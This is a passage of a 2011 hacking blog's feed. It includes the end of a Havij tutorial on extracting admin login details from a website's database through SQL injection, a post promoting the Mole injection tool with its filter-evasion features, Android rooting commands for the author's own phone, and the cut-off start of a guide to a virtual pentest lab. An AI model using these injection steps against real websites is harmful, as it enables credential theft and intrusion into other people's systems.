href=&quot;http://1.bp.blogspot.com/-03OAZQ5TiBI/TtkrdN7oimI/AAAAAAAAA7E/kWsuCQajeaI/s1600/sql1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://1.bp.blogspot.com/-03OAZQ5TiBI/TtkrdN7oimI/AAAAAAAAA7E/kWsuCQajeaI/s320/sql1.PNG&quot; width=&quot;315&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;4. Once a database is found, you can click on TABLES tab to view the available tables.&lt;br /&gt;&lt;br /&gt;You will be presented with all the tables that are available in the database of the website. It contains all the information that is displayed on the webpage. The next target can be to look for a table that contains some information about admin login details. .&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-TdDRolcFrrY/TtktFqCAcpI/AAAAAAAAA7U/ChajEPmAg68/s1600/sql2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;552&quot; src=&quot;http://4.bp.blogspot.com/-TdDRolcFrrY/TtktFqCAcpI/AAAAAAAAA7U/ChajEPmAg68/s640/sql2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;5. In our example the table tbl_admin looks like a table that may contain admin details. Select that table and click on GET COLUMNS.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ozcwApvWLKc/TtkuKdX9ExI/AAAAAAAAA7c/1vVFonHvJbQ/s1600/sql3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;http://2.bp.blogspot.com/-ozcwApvWLKc/TtkuKdX9ExI/AAAAAAAAA7c/1vVFonHvJbQ/s640/sql3.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;6. You will be listed with various columns that are present in the table.&lt;br /&gt;&lt;br /&gt;7. Now select those columns whose data you want to retrieve.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-edi_v0fUNcs/Ttkuen7_IFI/AAAAAAAAA7k/SqNAZKuBSH0/s1600/sql4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;326&quot; src=&quot;http://3.bp.blogspot.com/-edi_v0fUNcs/Ttkuen7_IFI/AAAAAAAAA7k/SqNAZKuBSH0/s640/sql4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;8. After selecting the various columns, click on GET DATA to get the values stored in the columns.&lt;br /&gt;You can see in the figure how Havij has successfully retrieved the admin login details for us.&lt;br /&gt;&lt;br /&gt;This technique can also be used to dig out the other user details of the website. Keep experimenting.&lt;br /&gt;&lt;br /&gt;Well I will leave you with a question . What to do with this admin details now ??&lt;br /&gt;wait for the next post for answer. In case you have an answer then add it in comments below.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2756732865095606856/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-sql-injection-tutorial-with.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2756732865095606856'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2756732865095606856'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-sql-injection-tutorial-with.html' title='Complete SQL injection tutorial with Havij'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s72-c/untitled.bmp" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-30269175375138666</id><published>2011-12-02T18:28:00.001+05:30</published><updated>2011-12-09T18:29:32.782+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking software"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><title type='text'>The Mole - New SQL injection tool+tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s1600/www.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s200/www.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Features&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Support for injections using Mysql, SQL Server, Postgres and Oracle databases.&lt;br /&gt;&lt;br /&gt;Command line interface. Different commands trigger different actions.&lt;br /&gt;&lt;br /&gt;Auto-completion for commands, command arguments and database, table and columns names.&lt;br /&gt;&lt;br /&gt;Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.&lt;br /&gt;&lt;br /&gt;Developed in python 3.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://themole.sourceforge.net/?q=tutorial&quot; target=&quot;_blank&quot;&gt;Download tutorial&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/47oir&quot; target=&quot;_blank&quot;&gt;Download Mole for Winodws&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/47okA&quot; target=&quot;_blank&quot;&gt;Download Mole for Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/30269175375138666/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/mole-new-sql-injection-tooltutorial.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/30269175375138666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/30269175375138666'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/mole-new-sql-injection-tooltutorial.html' title='The Mole - New SQL injection tool+tutorial'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s72-c/www.jpg" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6345778314367890574</id><published>2011-11-27T00:22:00.000+05:30</published><updated>2011-11-27T00:23:06.973+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="android hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Rooting An Android Phone From Scratch - My Experiments with Truth!!</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s1600/an7.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s200/an7.PNG&quot; width=&quot;127&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends. From past 3 days I was on an rooting rampage with my HTC Tattoo android phone. I was a fan of Android before I ever rooted my phone and now I am in love with it since I have rooted it. The real power of any operating system lies when you have the command of the super user. This is what rooting is all about.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Rooting a device needs two things. First the right set of files for rooting and second the courage to play with a 12,000 Rs phone that you brought by saving your earnings( the cost of phone may vary depending upon the heaviness of your&amp;nbsp;surname). These days I started small development work on android to learn its basics. I am looking forward to dive deep into this mobile OS. From past few days I was very much troubled with the word &quot;rooting&quot; and was getting really restless about it. Finally I decided on 23-11-2011 to finally sit down,leave all work and start my work on android rooting. So i started with working on android SDK first. Working of Android SDK is fairly simple and is just like the linux command line( in-fact it is a unix command line). After getting an overview of the basics of android-windows-sdk , I switched on to look for various commands and mode of working of it. Then I moved ahead to root my android phone. And finally after a struggle of 3 days I finally rooted my phone and installed a custom ROM. Oops I forgot to define what is rooting.&lt;br /&gt;&lt;br /&gt;Rooting means to gain permissions of a superuser or the root user in any Unix based OS. This is a universal&amp;nbsp;definition&amp;nbsp;for a unix based Os which contains a special super user called root.&lt;br /&gt;So to gain&amp;nbsp;privilege&amp;nbsp;of root is called rooting.&lt;br /&gt;Android sdk also contains a a superb tool calld Android Debug Bridhe(ADB). It is a tool that is used to send commands to the android device using a laptop/PC. We will be extensively using it in this experiment.&lt;br /&gt;&lt;br /&gt;Well there are lots of excellent rooting tutorials and videos available on the internet for free. You can find lots of useful resources. I will recommend you to check the threads of xda-developers forum which has some of the finest posts on rooting android phone. The main reason for creating this post is to let my readers gain intrest in exploring things. The fun of gadgets is not just in using them. The real fun lies in technically playing with them. So I am creating this post to encourage my readers to explore their android devices ( rather spoil!! ) and feel its power.&lt;br /&gt;I still tried to remain a bit different from&amp;nbsp;various&amp;nbsp;soruces I found on the&amp;nbsp;internet&amp;nbsp;and which I used to root my phone. What I have done here is I have created a single folder called tattoo.rar which can be downloaded from here - &lt;a href=&quot;http://rapidshare.com/files/403766494/Tattoo.rar.html&quot;&gt;DOWNLOAD.&amp;nbsp;&lt;/a&gt;&lt;br /&gt;This file can be&amp;nbsp;directly&amp;nbsp;downloaded and unzipped to any drive. Then by using the set of commands below you can get root&amp;nbsp;privilege&amp;nbsp;to your phone and later on install a higher version of Android ROM on it.&lt;br /&gt;&lt;br /&gt;Before we&amp;nbsp;begin&amp;nbsp;we will have to download the android sdk. It can be downloaded from &lt;a href=&quot;http://developer.android.com/sdk/index.html&quot;&gt;HERE.&lt;/a&gt;&amp;nbsp;Once you have downloaded it, unzip it to any drive, say C drive. Open the folder and run SDKmanager.exe . If you are running it for the first time then it will show you a list of packages that you can install from the list.&lt;br /&gt;You will have to install just one package for the time being. That is Android-sdk platform tools.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-pJTx70ir2hs/TtEoSuP9dJI/AAAAAAAAA6M/L9JadlH4Vmk/s1600/an1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;286&quot; src=&quot;http://2.bp.blogspot.com/-pJTx70ir2hs/TtEoSuP9dJI/AAAAAAAAA6M/L9JadlH4Vmk/s400/an1.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once you have finished installing the pakage the next thing you can do is set the class path in environment variables. This is an optional step but it can speed up your process of working.&lt;br /&gt;To set up the environment variables Right click on My Computer, Go to properties, then Advance System Settings , then Environment Variables. In System Variables, look for PATH. Double click on it to edit it. Then add the following path in it :&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;i&gt;;c:\android-sdk-windows\tools;c:\android-sdk-windows\platform-tools&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now you are all set. To check what you have done, open command prompt type&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt; adb&lt;/span&gt;. Yo will see a list of options.&lt;br /&gt;Now coming back to the downloaded file, tattoo.rar. Unzip it to any folder of your choice. Suppose I unzipped it in my c drive.&lt;br /&gt;Now start command prompt and change directory to c:/tattoo&lt;br /&gt;Your prompt should look something like this : c:/tattoo&amp;gt;&lt;br /&gt;&lt;br /&gt;Now plug your HTC tattoo to USB. At the command prompt type the following command;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;adb devices&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;If it shows a device listed, it means your device is connected and responding.&lt;br /&gt;Let us proceed. Now execute the following commands in the same sequence as mentioned.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;1. Let&#39;s say you have everything unpacked into C:\Tattoo&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2. In your terminal (on your PC) type:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb shell &quot;mkdir /data/local/bin&quot; (if it returns an error it means that the directory already exists, just proceed)&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push m7 /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push su /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push flash_image /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push tattoo-hack.ko /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push recovery.img /sdcard&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push boot.img /sdcard&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;3. We have every needed file on the phone now. Type now (we are still in your terminal):&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb shell&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ cd /data/local/bin&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ chmod 766 m7 (I don&#39;t retain this step as mandatory, so if this process fails, just proceed)&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ while ./m7 ; do : ; done&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;lots of text until you see something like &quot;wrote shell code&quot;, press enter 2 or 3 times enter to see:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;#&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;4. Then perform this:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # export LD_LIBRARY_PATH=/system/lib&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # export PATH=/system/bin&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # insmod ./tattoo-hack.ko&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # mount -o rw,remount /dev/block/mtdblock5 /data&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # mount -o rw,remount /dev/block/mtdblock3 /system&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # cat ./su &amp;gt; /system/bin/su&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # chmod 4755 /system/bin/su&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # chmod 755 ./flash_image&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Successful execution of these commands will root your device and you can now have full rights on your HTC tattoo phone.&lt;br /&gt;Now how to check if rooting is successful or not. To check it, switch off your phone. Now press the &quot;Home&quot; key and then power it own. You will see a recovery screen similar to the one in figure.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-qMCwZ2DzXFk/TtEvQX1KPaI/AAAAAAAAA6U/rIZR7YETYQ4/s1600/an4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://3.bp.blogspot.com/-qMCwZ2DzXFk/TtEvQX1KPaI/AAAAAAAAA6U/rIZR7YETYQ4/s400/an4.png&quot; width=&quot;300&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see you are now presented with certain boot options which were previously not available for you. Now along with rooting the device with the set of commands mentioned above, we also flashed the SD card so that it becomes capable of installing custom ROM&#39;s. Custom ROM&#39;s are developed using a perticular version of android with a different interface. Installing a custom ROM can enhance your mobile performance. You can find lots of custom ROM available on the internet. I would recommend to check out this page - &lt;a href=&quot;http://theunlockr.com/category/roms-2/android-roms-2/htc-tattoo-roms/&quot;&gt;Custom ROM&lt;/a&gt;. It has whole list of custom ROM&#39;s for HTC Tattoo.&lt;br /&gt;I chose a custom ROM based on Android 2.3 Gingerbred so as to upgrade my old Android 1.6 pre-installed OS. This is the biggest advantage of rooting. You can install higher versions of OS even if the manufacturer is not producing updates. All you have to do is simply download a custom ROM and copy it in the SD card. Dont copy in any folder, just inside the card in zip format. Now in the above image you will find an option &quot;install zip from SD card&quot;. Once you click on it you will be presented with a screen similar to the one shown below :&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-6gAf_lcenNY/TtExo3WyAmI/AAAAAAAAA6c/2JLun8fu5v0/s1600/an5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://4.bp.blogspot.com/-6gAf_lcenNY/TtExo3WyAmI/AAAAAAAAA6c/2JLun8fu5v0/s320/an5.PNG&quot; width=&quot;241&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;You can see the two zip custom ROMs available on my SD card which I had copied. Now I can select any one of them and install it on my phone. Once the installation is complete, reboot your phone and you are ALLLLL DDOONNEE !!&lt;br /&gt;&lt;br /&gt;Finally you will have a new version of android installed on your phone.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-69tr7WDHs-A/TtEyS2BMFYI/AAAAAAAAA6k/eRKY0BXqV4s/s1600/an6.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://3.bp.blogspot.com/-69tr7WDHs-A/TtEyS2BMFYI/AAAAAAAAA6k/eRKY0BXqV4s/s320/an6.PNG&quot; width=&quot;269&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;SPECIAL NOTE&lt;/i&gt;&lt;/b&gt; : Rooting has certain advantages but it has disadvantages too. There can be several&amp;nbsp;components&amp;nbsp;which might not function properly. So before installing any custom ROM make sure it has all the basic common functions. Like in my case the&amp;nbsp;Camera&amp;nbsp;is not working but the battery usage and speed has increased greatly. Also there are numerous One-Click Root applications available for android devices who can automatically root your phone but I would&amp;nbsp;recommend&amp;nbsp;that you go for this manual&amp;nbsp;approach&amp;nbsp;it will give &amp;nbsp;better understanding.&lt;br /&gt;&lt;br /&gt;Hope you enjoyed reading this tutorial. If you too have a HTC Tattoo and you are bored of Dounut then dont wait, just jump to GingerBred. I bet you will love it.&lt;br /&gt;Do Leave your comments and suggestions.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6345778314367890574/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/rooting-android-phone-from-scratch-my.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6345778314367890574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6345778314367890574'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/rooting-android-phone-from-scratch-my.html' title='Rooting An Android Phone From Scratch - My Experiments with Truth!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s72-c/an7.PNG" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2370883560292877112</id><published>2011-11-23T10:34:00.001+05:30</published><updated>2011-11-27T01:56:49.428+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="backtrack"/><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="windows hacking"/><title type='text'>Setting up your own Pentesting/Hacking Network using a single Machine</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s200/images.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. Sorry for the long delay in writing a new post. I was out for some days and had no internet connectivity. When I came back and checked my mail, I found more than 10 mails asking me how to test for hacking. Actually this problem is because of the fact that there are too many&amp;nbsp;theoretical&amp;nbsp;tutorials available on the internet but there are hardly any practical implimentations shown.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&amp;nbsp;So the big problem lies in testing your knowledge. Unless you&amp;nbsp;don&#39;t&amp;nbsp;have practical exposure to hacking, you cannot really understand the&amp;nbsp;strength&amp;nbsp;of it. So I decided to reveal the professionals secret of pentesting/hacking. The technique I will discuss here will be advantageous for those who have only single system and want to set up a testing network using it. In case you have multiple systems then you can easily test for your skills by making one system as target and other as attacker. But what to do when we have only a single system at our disposal. Need not to worry. Virtual machine is the ultimate solution. You can set up your own hacking network and apply your skills to gain practical exposure to hacking.&lt;br /&gt;The only thing to look for is your systems hardware configuration. You should have minimum 2 GB RAM but it is highly&amp;nbsp;recommended&amp;nbsp;to use 3 GB RAM for a 32 bit operating system.&lt;br /&gt;We will be using Oracle VirtualBox in this tutorial. You can download virtualbox from this link - &lt;a href=&quot;https://www.virtualbox.org/wiki/Downloads&quot; target=&quot;_blank&quot;&gt;VBox&lt;/a&gt;.&lt;br /&gt;Once you have installed Vbox, the next step is to download the Extensions pack. You can get it from this link - &lt;a href=&quot;http://download.virtualbox.org/virtualbox/4.0.14/Oracle_VM_VirtualBox_Extension_Pack-4.0.14-74382.vbox-extpack&quot; target=&quot;_blank&quot;&gt;VBox Extension pack.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Once you have followed this initial steps, you are half done. The next step is to setup a target operating system. Suppose you want to set WINDOWS XP 